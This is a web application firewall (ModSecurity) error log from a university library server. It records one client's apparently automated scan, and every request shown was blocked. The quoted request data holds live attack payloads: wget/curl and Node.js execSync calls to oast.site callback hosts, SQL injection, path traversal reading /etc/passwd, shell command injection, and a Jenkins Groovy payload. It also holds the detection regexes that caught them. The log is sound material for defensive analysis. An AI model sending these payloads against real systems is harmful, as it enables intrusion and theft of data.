[Tue Aug 29 11:32:59.717209 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlge9nq48zwheuip.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARH7LkAAAAM"]
[Tue Aug 29 11:33:05.767731 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAAQMr5gAAAAu"]
[Tue Aug 29 11:33:09.409422 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAAQKOhoAAAAs"]
[Tue Aug 29 11:33:09.907837 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAAPDoKoAAAAP"]
[Tue Aug 29 11:33:10.345550 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAANsAcEAAAAD"]
[Tue Aug 29 11:33:11.297329 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARNk8cAAAAS"]
[Tue Aug 29 11:33:12.514703 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARNk8sAAAAS"]
[Tue Aug 29 11:33:12.602611 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg51qpw7m3snsra.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg51qpw7m3snsra.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TAAAAAH"]
[Tue Aug 29 11:33:12.815480 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARdiG4AAAAK"]
[Tue Aug 29 11:33:12.834697 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgszmbmk31k5ag8.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgszmbmk31k5ag8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARdiG8AAAAK"]
[Tue Aug 29 11:33:13.302947 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgo3wbihwa4dfpa.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgo3wbihwa4dfpa.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARNk9QAAAAS"]
[Tue Aug 29 11:33:13.343961 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmedg64qetjryf.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmedg64qetjryf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARH7OEAAAAM"]
[Tue Aug 29 11:33:14.390935 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARYxDUAAAAJ"]
[Tue Aug 29 11:33:14.458817 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARTEMkAAAAG"]
[Tue Aug 29 11:33:14.565075 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARA7ewAAAAA"]
[Tue Aug 29 11:33:18.040544 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgw7yhrqjm549cy.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARpgwQAAAAU"]
[Tue Aug 29 11:33:18.776920 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgaw4o45cofkixd.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARdiH0AAAAK"]
[Tue Aug 29 11:33:19.016686 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARt-78AAAAV"]
[Tue Aug 29 11:33:19.031754 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAAR2Z2oAAAAe"]
[Tue Aug 29 11:33:19.080186 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARTENMAAAAG"]
[Tue Aug 29 11:33:19.323585 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARfwjMAAAAI"]
[Tue Aug 29 11:33:19.351152 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARo8xAAAAAT"]
[Tue Aug 29 11:33:21.302440 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARxOqAAAAAa"]
[Tue Aug 29 11:33:22.351639 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgd767z1xtcpofo.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARfwkMAAAAI"]
[Tue Aug 29 11:33:22.459564 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARzXxMAAAAd"]
[Tue Aug 29 11:33:23.375606 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARiDmUAAAAJ"]
[Tue Aug 29 11:33:24.318813 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgj7rwgmhxo4de1.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARo8x4AAAAT"]
[Tue Aug 29 11:33:24.357058 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARzXxsAAAAd"]
[Tue Aug 29 11:33:25.335952 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARu2rcAAAAW"]
[Tue Aug 29 11:33:25.343556 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARdiJIAAAAK"]
